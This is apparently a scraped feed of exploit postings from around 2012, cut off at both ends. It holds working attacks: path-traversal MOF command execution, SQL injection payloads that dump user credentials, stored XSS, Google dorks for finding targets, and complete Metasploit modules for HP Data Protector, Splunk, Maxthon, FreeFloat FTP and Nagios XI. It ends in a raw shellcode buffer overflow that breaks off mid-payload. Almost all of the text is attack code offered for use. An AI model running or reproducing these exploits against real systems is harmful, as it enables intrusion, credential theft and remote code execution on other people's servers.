"[!] USAGE : mof \"<command]>\"" return msg = "<ROOT><NAME>FSFUI</NAME><UICMD>130</UICMD><TOKEN><FILE>../../../../../../Windows/system32/wbem/mof/command.mof</FILE></TOKEN><![CDATA[" msg += genMof(argv[1] + "> C:/Windows/System32/info.dat") msg += "]]></ROOT>" body = message_MD5(msg).upper() + msg headers = {"Content-type": "text/xml"} conn = httplib.HTTPSConnection("192.168.10.20:3037") conn.request("POST", "/SRS/CMD",body, headers) response = conn.getresponse() print "\n...Command Executed ..." print response.status, response.reason print response.read() msg = "<ROOT><NAME>FSFUI</NAME><UICMD>126</UICMD><TOKEN><FILE>../../../../../../WINDOWS/system32/info.dat</FILE></TOKEN></ROOT>" body = message_MD5(msg).upper() + msg conn.request("POST", "/SRS/CMD",body, headers) response = conn.getresponse() conn.request("POST", "/SRS/CMD",body, headers) response = conn.getresponse() print "\n...Getting result ..." print response.status, response.reason print response.read() conn.close() if name == "main": main()

==> MyBB Bank-v3 Plugin SQL Injection

http://rss.feedsportal.com/c/32479/f/477548/index.rss # Exploit Title: Bank v3 MyBB plugin SQLi 0day # Exploit Author: Red_Hat [NullSec] # Software Link: http://mods.mybb.com/download/bank-v3 # Tested on: Windows & Linux. Vulnerable code : <?php $user=$_POST['r_username']; $pay=intval($_POST['r_pay']); $query_r=$db->query("SELECT * FROM ".TABLE_PREFIX."users WHERE username='$user'"); $fetch=$db->fetch_array($query_r); ?> The variable '$mybb->input['id']' remains unsanitized. Usage : http://www.site.com/bank.php /GET transactions=send /POST r_pay=Red_Hat&r_username=[SQLi]

==> Joomla JooProperty 1.13.0 Multiple Vulnerabilities

http://rss.feedsportal.com/c/32479/f/477548/index.rss 1 ######################################### 1 0 I'm D4NB4R member from Inj3ct0r Team 1 1 ######################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 #Exploit Title: Joomla com_jooproperty SQL injection && Cross site scripting Vulnerability Dork: inurl:com_jooproperty Date: [10-12-2012] Author: Daniel Barragan "D4NB4R" Twitter: @D4NB4R Vendor: http://www.jooproperty.com/ Version: 1.13.0 Date Added: 12 November 2012 License: GPLv2 or later Commercial] Compatibility: Joomla! 2.5 Series Information: http://extensions.joomla.org/extensions/vertical-markets/real-estate/22500 Tested on: [Linux(Arch)-Windows(7ultimate)] Descripcion: JooProperty is a real estate component developed for Joomla 1.7 and 2.5 with complex integrated booking features, price calculation for different seasons and comment and rating functions. The component is based on com-property for Joomla 1.5 of Fabio Ueltzinger and offers the possibility to import the database of com-property V3 and V4 to migrate your realty website to Joomla 2.5. All property relevant information like categories, locations, description, extras/amenities, season, price categories, prices and special fees can be translated. Vulnerable Parameter Name: product_id Parameter Type: Querystring Method: Get Attack Pattern Sql: -{Valid id}%20and%201=0%20union%20select%201,(select group_concat(username,0x3D,password)%20from%20dy978_users)+--+D4NB4R Attack Pattern Xss: ?layout=modal&option=com_jooproperty&product_id=" onmouseover%3dprompt() bad%3d"&view=booking Exploit Demo: SQLi : SQL injection http://localhost/?option=com_jooproperty&;view=booking&layout=modal&product_id=1%20and%201=0%20union%20select%201,(select group_concat(username,0x3D,password)%20from%20dy978_users)+--+D4NB4R xss : Cross site scripting http://localhost/?layout=modal&;option=com_jooproperty&product_id=%22%20onmouseover%3dprompt%28%29%20bad%3d%22&view=booking Greetz: All Member Inj3ct0r Team * m1nds group (www.m1nds.com)* pilot * aku * navi_terrible * dedalo * ksha * shine * devboot * r0073r * indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3 Jago-dz * Kha&miX * T0xic * Ev!LsCr!pT_Dz * By Over-X *Saoucha * Cyber Sec * theblind74 * onurozkan * n2n * Meher Assel * L0rd CruSad3r * MaYur * MA1201 * KeDar * Sonic * gunslinger_ * SeeMe * RoadKiller Sid3^effects * aKa HaRi * His0k4 * Hussin-X * Rafik * Yashar * SoldierOfAllah * RiskY.HaCK * Stake * MR.SoOoFe * ThE g0bL!N * AnGeL25dZ * ViRuS_Ra3cH * Sn!pEr.S!Te
Daniel Barragan "D4NB4R" 2012

==> MyBB Profile Blogs Plugin 1.2 Multiple Vulnerabilities

http://rss.feedsportal.com/c/32479/f/477548/index.rss # Exploit Title: MyBB Profile Blog plugin multiple vulnerabilities. # Google Dork: inurl:member.php intext:"Profile Blogs" for MyBB # Date: 12.9.2012 # Exploit Author: Zixem # Vendor Homepage: http://fklar.pl/ # Software Link: http://mods.mybb.com/view/profile-blogs # Version: 1.2+ # Tested on: Linux. MyBB Profile Blogs plugin suffers from SQL Injection && Stored XSS. The vulnerabilities exist withing profileblogs.php which located in /plugins/ folder. #################################### SQLi #################################### Instructions: 1. Create a new post in your profile blog. 2. Edit it. 3. Inject in edit GET parameter. Vulnerable part: <?php /*Line 253*/ $pid = $mybb->input['edit']; /*Line 259*/ $db->query("UPDATE `".TABLE_PREFIX."blogposts` SET `subject` = '".$subject."', `message` = '".$message."' WHERE `pid` = '".$pid."'"); ?> How to exploit it: member.php?action=profile&uid=2&blogpage=1&edit=[VAILD_ID]'[SQLi] PoC: http://i.imgur.com/HY60R.png +------------------------------------------------------------------------------------+ #################################### Stored-XSS #################################### The post subject is stored in the database without XSS protection, like this: <?php $subject = addslashes($mybb->input['subject']); $db->query("INSERT INTO `".TABLE_PREFIX."blogposts` VALUES (NULL, '".$uid."', '".$dateline."', '".$subject."', '".$message."', '".$ipaddress."')"); ?> And also comes out without XSS protection: <?php /*328*/ while($post = $db->fetch_array($query)) { /*333*/ $blog .= "<strong style=\"float: left;\">".$post['subject']."</strong><br />"; ?> As a result, we're getting Stored-XSS. How to exploit that: http://i.imgur.com/OTIRa.png PoC: http://i.imgur.com/2Hv9J.png

==> HP Data Protector DtbClsLogin Buffer Overflow

http://rss.feedsportal.com/c/32479/f/477548/index.rss ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::Seh def initialize(info = {}) super(update_info(info, 'Name' => 'HP Data Protector DtbClsLogin Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in HP Data Protector 4.0 SP1. The overflow occurs during the login process, in the DtbClsLogin function provided by the dpwindtb.dll component, where the Utf8Cpy (strcpy like function) is used in an insecure way with the username. A successful exploitation will lead to code execution with the privileges of the "dpwinsdr.exe" (HP Data Protector Express Domain Server Service) process, which runs as SYSTEM by default. }, 'Author' => [ 'AbdulAziz Hariri', # Vulnerability discovery 'juan vazquez' # Metasploit module ], 'References' => [ [ 'CVE', '2010-3007' ], [ 'OSVDB', '67973' ], [ 'BID', '43105' ], [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-10-174/'; ], [ 'URL', 'http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02498535'; ] ], 'Payload' => { 'Space' => 712, 'BadChars' => "\x00", 'DisableNops' => true }, 'Platform' => 'win', 'Targets' => [ ['HP Data Protector Express 4.0 SP1 (build 43064) / Windows XP SP3', { 'Ret' => 0x66dd3e49, # ppr from ifsutil.dll (stable over windows updates on June 26, 2012) 'Offset' => 712 } ] ], 'DefaultTarget' => 0, 'Privileged' => true, 'DisclosureDate' => 'Sep 09 2010' )) register_options( [ Opt::RPORT(3817), ], self.class) end def check connect machine_name = rand_text_alpha(15) print_status("#{sock.peerinfo} - Sending Hello Request") hello = "\x54\x84\x00\x00\x00\x00\x00\x00" << "\x00\x01\x00\x00\x92\x00\x00\x00" hello << "\x3a\x53\xa5\x71\x02\x40\x80\x00" << "\x89\xff\xb5\x00\x9b\xe8\x9a\x00" hello << "\x01\x00\x00\x00\xc0\xa8\x01\x86" << "\x00\x00\x00\x00\x00\x00\x00\x00" hello << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00" hello << "\x00\x00\x00\x00\x01\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00" hello << "\x00\x00\x00\x00" hello << machine_name << "\x00" hello << "\x5b\x2e\xad\x71\xb0\x02\x00\x00" << "\xff\xff\x00\x00\x06\x10\x00\x44" hello << "\x74\x62\x3a\x20\x43\x6f\x6e\x74" << "\x65\x78\x74\x00\xe8\xc1\x08\x10" hello << "\xb0\x02\x00\x00\xff\xff\x00\x00" << "\x06\x10\x00\x00\x7c\xfa" sock.put(hello) hello_response = sock.get disconnect if hello_response and hello_response =~ /Dtb: Context/ return Exploit::CheckCode::Detected end return Exploit::CheckCode::Safe end def exploit connect machine_name = rand_text_alpha(15) print_status("#{sock.peerinfo} - Sending Hello Request") hello = "\x54\x84\x00\x00\x00\x00\x00\x00" << "\x00\x01\x00\x00\x92\x00\x00\x00" hello << "\x3a\x53\xa5\x71\x02\x40\x80\x00" << "\x89\xff\xb5\x00\x9b\xe8\x9a\x00" hello << "\x01\x00\x00\x00\xc0\xa8\x01\x86" << "\x00\x00\x00\x00\x00\x00\x00\x00" hello << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00" hello << "\x00\x00\x00\x00\x01\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00" hello << "\x00\x00\x00\x00" hello << machine_name << "\x00" hello << "\x5b\x2e\xad\x71\xb0\x02\x00\x00" << "\xff\xff\x00\x00\x06\x10\x00\x44" hello << "\x74\x62\x3a\x20\x43\x6f\x6e\x74" << "\x65\x78\x74\x00\xe8\xc1\x08\x10" hello << "\xb0\x02\x00\x00\xff\xff\x00\x00" << "\x06\x10\x00\x00\x7c\xfa" sock.put(hello) hello_response = sock.get if not hello_response or hello_response.empty? print_error("#{sock.peerinfo} - The Hello Request hasn't received a response") return end bof = payload.encoded bof << rand_text(target['Offset']-bof.length) bof << generate_seh_record(target.ret) bof << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-#{target['Offset']+8}").encode_string # The line below is used to trigger exception, don't go confused because of the big space, # there are only some available bytes until the end of the stack, it allows to assure exception # when there are mappings for dynamic memory after the stack, so to assure reliability it's better # to jump back. bof << rand_text(100000) header = [0x8451].pack("V") # packet id header << [0x32020202].pack("V") # svc id header << [0x00000018].pack("V") # cmd id header << [0].pack("V") # pkt length, calculated after pkt has been built header << "\x00\x00\x00\x00" # ?Unknown? pkt_auth = header pkt_auth << bof # username pkt_auth12, = [pkt_auth.length].pack("V") print_status("#{sock.peerinfo} - Sending Authentication Request") sock.put(pkt_auth) disconnect end end

==> Splunk 5.0 Custom App Remote Code Execution PoC

http://rss.feedsportal.com/c/32479/f/477548/index.rss ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Splunk 5.0 Custom App Remote Code Execution', 'Description' => %q{ This module exploits a feature of Splunk whereby a custom application can be uploaded through the web based interface. Through the 'script' search command a user can call commands defined in their custom application which includes arbitrary perl or python code. To abuse this behavior, a valid Splunk user with the admin role is required. By default, this module uses the credential of "admin:changeme", the default Administrator credential for Splunk. Note that the Splunk web interface runs as SYSTEM on Windows, or as root on Linux by default. This module has only been tested successfully against Splunk 5.0. }, 'Author' => [ "@marcwickenden", # discovery and metasploit module "sinn3r", # metasploit module "juan vazquez", # metasploit module ], 'License' => MSF_LICENSE, 'References' => [ [ 'URL', 'http://blog.7elements.co.uk/2012/11/splunk-with-great-power-comes-great-responsibility.html'; ], [ 'URL', 'http://blog.7elements.co.uk/2012/11/abusing-splunk-with-metasploit.html'; ], [ 'URL', 'http://docs.splunk.com/Documentation/Splunk/latest/SearchReference/Script'; ] ], 'Payload' => { 'Space' => 1024, 'DisableNops' => true }, 'Targets' => [ [ 'Splunk 5.0.1 / Linux', { 'Arch' => ARCH_CMD, 'Platform' => [ 'linux', 'unix' ] } ], [ 'Splunk 5.0.1 / Windows', { 'Arch' => ARCH_CMD, 'Platform' => 'win' } ] ], 'DisclosureDate' => 'Sep 27 2012')) register_options( [ Opt::RPORT(8000), OptString.new('USERNAME', [ true, 'The username with admin role to authenticate as','admin' ]), OptString.new('PASSWORD', [ true, 'The password for the specified username','changeme' ]), OptPath.new('SPLUNK_APP_FILE', [ true, 'The "rogue" Splunk application tgz', File.join(Msf::Config.install_root, 'data', 'exploits', 'splunk', 'upload_app_exec.tgz') ]) ], self.class) register_advanced_options( [ OptBool.new('ReturnOutput', [ true, 'Display command output', false ]), OptBool.new('DisableUpload', [ true, 'Disable the app upload if you have already performed it once', false ]), OptBool.new('EnableOverwrite', [true, 'Overwrites an app of the same name. Needed if you change the app code in the tgz', false]), OptInt.new('CommandOutputDelay', [true, 'Seconds to wait before requesting command output from Splunk', 5]) ], self.class) end def exploit # process standard options @username = datastore['USERNAME'] @password = datastore['PASSWORD'] file_name = datastore['SPLUNK_APP_FILE'] # process advanced options return_output = datastore['ReturnOutput'] disable_upload = datastore['DisableUpload'] @enable_overwrite = datastore['EnableOverwrite'] command_output_delay = datastore['CommandOutputDelay'] # set up some variables for later use @auth_cookies = '' @csrf_form_key = '' app_name = 'upload_app_exec' p = payload.encoded print_status("Using command: #{p}") cmd = Rex::Text.encode_base64(p) # log in to Splunk (if required) do_login # fetch the csrf token for use in the upload next do_get_csrf('/en-US/manager/launcher/apps/local') unless disable_upload # upload the arbitrary command execution Splunk app tgz do_upload_app(app_name, file_name) end # get the next csrf token from our new app do_get_csrf("/en-US/app/#{app_name}/flashtimeline") # call our command execution function with the Splunk 'script' command print_status("Invoking script command") res = send_request_cgi( { 'uri' => '/en-US/api/search/jobs', 'method' => 'POST', 'cookie' => @auth_cookies, 'headers' => { 'X-Requested-With' => 'XMLHttpRequest', 'X-Splunk-Form-Key' => @csrf_form_key }, 'vars_post' => { 'search' => "search * | script msf_exec #{cmd}", # msf_exec defined in default/commands.conf 'status_buckets' => "300", 'namespace' => "#{app_name}", 'ui_dispatch_app' => "#{app_name}", 'ui_dispatch_view' => "flashtimeline", 'auto_cancel' => "100", 'wait' => "0", 'required_field_list' => "*", 'adhoc_search_level' => "smart", 'earliest_time' => "0", 'latest_time' => "", 'timeFormat' => "%s.%Q" } }) if return_output res.body.match(/data":\ "([0-9.]+)"/) job_id = $1 # wait a short time to let the output be produced print_status("Waiting for #{command_output_delay} seconds to retrieve command output") select(nil,nil,nil,command_output_delay) job_output = fetch_job_output(job_id) if job_output.body.match(/Waiting for data.../) print_status("No output returned in time") elsese output = "" job_output.body.each_line do |line| # strip off the leading and trailing " added by Splunk line.gsub!(/^"/,"") line.gsub!(/"$/,"") output << line end # return the output print_status("Command returned:") print_line output end else handler end end def check # all versions are actually "vulnerable" but check implemented for future proofing # and good practice res = send_request_cgi( { 'uri' => '/en-US/account/login', 'method' => 'GET' }, 25) if res and res.body =~ /Splunk Inc\. Splunk/ return Exploit::CheckCode::Appears else return Exploit::CheckCode::Safe end end def do_login print_status("Authenticating...") # this method borrowed with thanks from splunk_mappy_exec.rb res = send_request_cgi( { 'uri' => '/en-US/account/login', 'method' => 'GET' }) cval = '' uid = '' session_id_port = session_id = '' if res and res.code == 200 res.headers['Set-Cookie'].split(';').each {|c| c.split(',').each {|v| if v.split('=')[0] =~ /cval/ cval = v.split('=')[1] elsif v.split('=')[0] =~ /uid/ uid = v.split('=')[1] elsif v.split('=')[0] =~ /session_id/ session_id_port = v.split('=')[0] session_id = v.split('=')[1] end } } else fail_with(Exploit::Failure::NotFound, "Unable to get session cookies") end res = send_request_cgi( { 'uri' => '/en-US/account/login', 'method' => 'POST', 'cookie' => "uid=#{uid}; #{session_id_port}=#{session_id}; cval=#{cval}", 'vars_post' => { 'cval' => cval, 'username' => @username, 'password' => @password } }) if not res or res.code != 303 fail_with(Exploit::Failure::NoAccess, "Unable to authenticate") else session_id_port = '' session_id = '' res.headers['Set-Cookie'].split(';').each {|c| c.split(',').each {|v| if v.split('=')[0] =~ /session_id/ session_id_port = v.split('=')[0] session_id = v.split('=')[1] end } } @auth_cookies = "#{session_id_port}=#{session_id}" end end def do_upload_app(app_name, file_name) archive_file_name = ::File.basename(file_name) print_status("Uploading file #{archive_file_name}") file_data = ::File.open(file_name, "rb") { |f| f.read } boundary = '----------' + rand_text_alphanumeric(6) data = "--#{boundary}\r\n" data << "Content-Disposition: form-data; name=\"splunk_form_key\"\r\n\r\n" data << "#{@csrf_form_key}" data << "\r\n--#{boundary}\r\n" if @enable_overwrite data << "Content-Disposition: form-data; name=\"force\"\r\n\r\n" data << "1" data << "\r\n--#{boundary}\r\n" end data << "Content-Disposition: form-data; name=\"appfile\"; filename=\"#{archive_file_name}\"\r\n" data << "Content-Type: application/x-compressed\r\n\r\n" data << file_data data << "\r\n#{boundary}\r\n" res = send_request_cgi({ 'uri' => '/en-US/manager/appinstall/_upload', 'method' => 'POST', 'cookie' => @auth_cookies, 'ctype' => "multipart/form-data; boundary=#{boundary}", 'data' => data }, 30) if (res and (res.code == 303 or (res.code == 200 and res.body !~ /There was an error processing the upload/))) print_status("#{app_name} successfully uploaded") else fail_with(Exploit::Failure::Unknown, "Error uploading") end end def do_get_csrf(uri) print_status("Fetching csrf token from #{uri}") res = send_request_cgi( { 'uri' => uri, 'method' => 'GET', 'cookie' => @auth_cookies }) res.body.match(/FORM_KEY":\ "(\d+)"/) @csrf_form_key = $1 fail_with(Exploit::Failure::Unknown, "csrf form Key not found") if not @csrf_form_key end def fetch_job_output(job_id) # fetch the output of our job id as csv for easy parsing print_status("Fetching job_output for id #{job_id}") res = send_request_raw( { 'uri' => "/en-US/api/search/jobs/#{job_id}/result?isDownload=true&timeFormat=%25FT%25T.%25Q%25%3Az&maxLines=0&count=0&filename=&outputMode=csv&spl_ctrl-limit=unlimited&spl_ctrl-count=10000", 'method' => 'GET', 'cookie' => @auth_cookies, 'encode_param' => 'false' }) end end

==> Maxthon3 about:history XCS Trusted Zone Code Execution PoC

http://rss.feedsportal.com/c/32479/f/477548/index.rss ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::EXE def initialize(info = {}) super(update_info(info, 'Name' => 'Maxthon3 about:history XCS Trusted Zone Code Execution', 'Description' => %q{ Cross Context Scripting (XCS) is possible in the Maxthon about:history page. Injection in such privileged/trusted browser zone can be used to modify configuration settings and execute arbitrary commands. Please note this module only works against specific versions of XCS. Currently, we've only successfully tested on Maxthon 3.1.7 build 600 up to 3.2.2 build 1000. }, 'License' => MSF_LICENSE, 'Author' => [ 'Roberto Suggi Liverani', # Discovered the vulnerability and developed msf module 'sinn3r', # msf module 'juan vazquez' # msf module ], 'References' => [ ['URL', 'http://blog.malerisch.net/2012/12/maxthon-cross-context-scripting-xcs-about-history-rce.html';] ], 'Payload' => { 'DisableNops' => true }, 'Platform' => 'win', 'Targets' => [ ['Maxthon 3 (prior to 3.3) on Windows', {} ] ], 'DisclosureDate' => 'Nov 26 2012', 'DefaultTarget' => 0 )) end def on_request_uri(cli, request) if request.headers['User-agent'] !~ /Maxthon\/3/ or request.headers['User-agent'] !~ /AppleWebKit\/534.12/ print_status("Sending 404 for User-Agent #{request.headers['User-agent']}") send_not_found(cli) return end html_hdr = %Q| <html> <head> <title>Download</title> | html_ftr = %Q| </head> <body > <h1>Loading</h1> </body></html> | case request.uri when /\?jspayload/ p = regenerate_payload(cli) if (p.nil?) send_not_found(cli) return end # We're going to run this through unescape(), so make sure # everything is encoded penc = generate_payload_exe penc2 = Rex::Text.encode_base64(penc) # now this is base64 encoded payload which needs to be passed to the file write api in maxthon. # Then file can be launched via Program DOM API, because of this only Maxthon 3.1 versions are targeted. # The Program DOM API isn't available on Maxthon 3.2 and upper versions. content = %Q| if(maxthon.program) { var fileTemp = new maxthon.io.File.createTempFile("test","exe"); var fileObj = maxthon.io.File(fileTemp); maxthon.io.FileWriter(fileTemp); maxthon.io.writeDataURL("data:application/x-msdownload;base64,#{penc2}"); maxthon.program.Program.launch(fileTemp.name_,"C:"); } | when /\?history/ js = %Q| window.onload = function() { location.href = "about:history"; } | content = %Q| #{html_hdr} <script> #{js} </script> #{html_ftr} | when get_resource() print_status("Sending #{self.name} payload for request #{request.uri}") js = %Q| url = location.href; url2 = url + "?jspayload=1"; inj = "?history#%22/><img src=a onerror=%22" inj_1 = "a=document.createElement('script');a.setAttribute('src','"+url2+"');document.body.appendChild(a);"; window.location = unescape(inj) + inj_1; | content = %Q| #{html_hdr} <script> #{js} </script> #{html_ftr} | else print_status("Sending 404 for request #{request.uri}") send_not_found(cli) return end send_response_html(cli, content) end end

==> FreeFloat FTP Server Arbitrary File Upload

http://rss.feedsportal.com/c/32479/f/477548/index.rss ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Ftp include Msf::Exploit::Remote::TcpServer include Msf::Exploit::EXE include Msf::Exploit::WbemExec include Msf::Exploit::FileDropper def initialize(info={}) super(update_info(info, 'Name' => "FreeFloat FTP Server Arbitrary File Upload", 'Description' => %q{ This module abuses multiple issues in FreeFloat: 1. No credential is actually needed to login; 2. User's default path is in C:\, and this cannot be changed; 3. User can write to anywhere on the server's file system. As a result of these poor implementations, a malicious user can just log in and then upload files, and let WMI (Management Instrumentation service) to execute the payload uploaded. }, 'License' => MSF_LICENSE, 'Author' => [ 'sinn3r', # Vulnerability discovery, Metasploit module 'juan vazquez' # Metasploit module ], 'References' => [ ['URL', 'http://metasploit.com';] ], 'Platform' => 'win', 'Targets' => [ ['FreeFloat', {}] ], 'Privileged' => true, 'DisclosureDate' => "Dec 7 2012", 'DefaultTarget' => 0)) register_options( [ # Change the default description so this option makes sense OptPort.new('SRVPORT', [true, 'The local port to listen on for active mode', 8080]) ], self.class) deregister_options('FTPUSER', 'FTPPASS') # Using empty user and password end def check connect disconnect if banner =~ /FreeFloat/ return Exploit::CheckCode::Vulnerable else return Exploit::CheckCode::Safe end end def on_client_connect(cli) peer = "#{cli.peerhost}:#{cli.peerport}" case @stage when :exe print_status("#{peer} - Sending executable (#{@exe.length.to_s} bytes)") cli.put(@exe) @stage = :mof when :mof print_status("#{peer} - Sending MOF (#{@mof.length.to_s} bytes)") cli.put(@mof) end cli.close end def upload(filename) select(nil, nil, nil, 1) peer = "#{rhost}:#{rport}" print_status("#{peer} - Trying to upload #{::File.basename(filename)}") conn = connect(false, datastore['VERBOSE']) print_status("#{peer} - Sending empty login...") res = send_user("", conn) if not res or res !~ /331/ print_error("#{peer} - Error sending username") return false end res = send_pass("", conn) if not res or res !~ /230/ print_error("#{peer} - Error sending password") return false end print_good("#{peer} - Empty authentication was successful") # Switch to binary mode print_status("#{peer} - Set binary mode") send_cmd(['TYPE', 'I'], true, conn) # Prepare active mode: Get attacker's IP and source port src_ip = datastore['SRVHOST'] == '0.0.0.0' ? Rex::Socket.source_address : datastore['SRVHOST'] src_port = datastore['SRVPORT'].to_i # Prepare active mode: Convert the IP and port for active mode src_ip = src_ip.gsub(/\./, ',') src_port = "#{src_port/256},#{src_port.remainder(256)}" # Set to active mode print_status("#{peer} - Set active mode \"#{src_ip},#{src_port}\"") send_cmd(['PORT', "#{src_ip},#{src_port}"], true, conn) # Tell the FTP server to download our file send_cmd('STOR',, false, conn) disconnect(conn) end def exploit exe_name = "WINDOWS/system32/#{rand_text_alpha(rand(10)+5)}.exe" mof_name = "WINDOWS/system32/wbem/mof/#{rand_text_alpha(rand(10)+5)}.mof" @mof = generate_mof(::File.basename(mof_name), ::File.basename(exe_name)) @exe = generate_payload_exe @stage = :exe begin t = framework.threads.spawn("reqs", false) { # Upload our malicious executable u = upload(exe_name) # Upload the mof file upload(mof_name) if u register_file_for_cleanup("#{::File.basename(exe_name)}") register_file_for_cleanup("wbem\\mof\\good\\#{::File.basename(mof_name)}") } super ensure t.kill end end end

==> Nagios XI Network Monitor Graph Explorer Component Command Injection

http://rss.feedsportal.com/c/32479/f/477548/index.rss ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name' => "Nagios XI Network Monitor Graph Explorer Component Command Injection", 'Description' => %q{ This module exploits a vulnerability found in Nagios XI Network Monitor's component 'Graph Explorer'. An authenticated user can execute system commands by injecting it in several parameters, such as in visApi.php's 'host' parameter, which results in remote code execution. }, 'License' => MSF_LICENSE, 'Author' => [ 'Daniel Compton <daniel.compton[at]ngssecure.com>', #Original discovery 'sinn3r' ], 'References' => [ [ 'OSVDB', '83552' ], [ 'BID', '54263' ], [ 'URL', 'http://packetstormsecurity.org/files/118497/Nagios-XI-Network-Monitor-2011R1.9-OS-Command-Injection.html'; ] ], 'Payload' => { 'BadChars' => "\x00\x0d\x0a", 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic perl python ruby bash telnet', } }, 'Platform' => ['unix'], 'Arch' => ARCH_CMD, 'Targets' => [ ['Graph Explorer Component prior to 1.3', {}] ], 'Privileged' => false, 'DisclosureDate' => "Nov 30 2012", 'DefaultTarget' => 0)) register_options( [ # URI isn't registered, because this is set by the installer. OptString.new('USERNAME', [true, 'The username to login as', 'nagiosadmin']), OptString.new('PASSWORD', [true, 'The password to use']) ], self.class) end def check res = send_request_raw({ 'method' => 'GET', 'uri' => '/nagiosxi/includes/components/graphexplorer/visApi.php' }) if res and res.code == 404 print_error("Remote host does not have Graph Explorer installed.") elsif res and res.body =~ /Your session has timed out/ return Exploit::CheckCode::Detected end return Exploit::CheckCode::Safe end def get_login_data res = send_request_cgi({'uri'=>'/nagiosxi/login.php'}) return '' if !res nsp = res.body.scan(/<input type='hidden' name='nsp' value='(.+)'>/).flatten[0] || '' cookie = (res.headers['Set-Cookie'] || '').scan(/nagiosxi=(\w+); /).flatten[0] || '' return nsp, cookie end def is_loggedin(cookie) res = send_request_cgi({ 'method' => 'GET', 'uri' => '/nagiosxi/index.php', 'cookie' => "nagiosxi=#{cookie}" }) if res and res.body =~ /Logged in as: <a href=".+">#{datastore['USERNAME']}<\/a>/ return true else return false end end def login(nsp, cookie) res = send_request_cgi({ 'method' => 'POST', 'uri' => '/nagiosxi/login.php', 'cookie' => "nagiosxi=#{cookie}", 'vars_post' => { 'nsp' => nsp, 'page' => 'auth', 'debug' => '', 'pageopt' => 'login', 'username' => datastore['USERNAME'], 'password' => datastore['PASSWORD'], 'loginButton' => 'Login' }, 'headers' => { 'Origin' => "http://#{rhost}", 'Referer' => "http://#{rhost}/nagiosxi/login.php" } }) return is_loggedin(cookie) end def exploit nsp, cookie = get_login_data if nsp.empty? print_error("Unable to retrieve hidden value 'nsp'") return false end if login(nsp, cookie) print_status("Logged in as '#{datastore['USERNAME']}:#{datastore['PASSWORD']}'") else print_error("Failed to login as '#{datastore['USERNAME']}:#{datastore['PASSWORD']}'") return end print_status("Sending Command injection") send_request_cgi({ 'method' => 'GET', 'uri' => '/nagiosxi/includes/components/graphexplorer/visApi.php', 'cookie' => "nagiosxi=#{cookie}", 'vars_get' => { 'type' => 'stack', 'host' => "localhost`#{payload.encoded}`", 'service' => 'Swap_Usage', 'div' => 'visContainer1566841654', 'opt' => 'days' } }) end end

==> Free Float FTP Server USER Command Buffer Overflow Exploit

http://rss.feedsportal.com/c/32479/f/477548/index.rss #Exploit title: FreeFloat FTP Server Remote Command Execution USER Command Buffer Overflow #Date: 06/12/2012 #Exploit Author: D35m0nd142 #Vendor Homepage: http://www.freefoat.com #Tested on Windows XP SP3 with Ubuntu 12.04 #!/usr/bin/python import socket,sys,time,os import Tkinter,tkMessageBox os.system("clear") def exploit(): target = ip.get() junk = "\x41" * 230 # Offest Number --> 230 eip = "\x53\x93\x37\x7E" # 0x7E379353 FFE4 JMP ESP nops = "\x90" * 20 payload =("\xb8\xe9\x78\x9d\xdb\xda\xd2\xd9\x74\x24\xf4\x5e\x2b\xc9" + "\xb1\x4f\x31\x46\x14\x83\xc6\x04\x03\x46\x10\x0b\x8d\x61" + "\x33\x42\x6e\x9a\xc4\x34\xe6\x7f\xf5\x66\x9c\xf4\xa4\xb6" + "\xd6\x59\x45\x3d\xba\x49\xde\x33\x13\x7d\x57\xf9\x45\xb0" + "\x68\xcc\x49\x1e\xaa\x4f\x36\x5d\xff\xaf\x07\xae\xf2\xae" + "\x40\xd3\xfd\xe2\x19\x9f\xac\x12\x2d\xdd\x6c\x13\xe1\x69" + "\xcc\x6b\x84\xae\xb9\xc1\x87\xfe\x12\x5e\xcf\xe6\x19\x38" + "\xf0\x17\xcd\x5b\xcc\x5e\x7a\xaf\xa6\x60\xaa\xfe\x47\x53" + "\x92\xac\x79\x5b\x1f\xad\xbe\x5c\xc0\xd8\xb4\x9e\x7d\xda" + "\x0e\xdc\x59\x6f\x93\x46\x29\xd7\x77\x76\xfe\x81\xfc\x74" + "\x4b\xc6\x5b\x99\x4a\x0b\xd0\xa5\xc7\xaa\x37\x2c\x93\x88" + 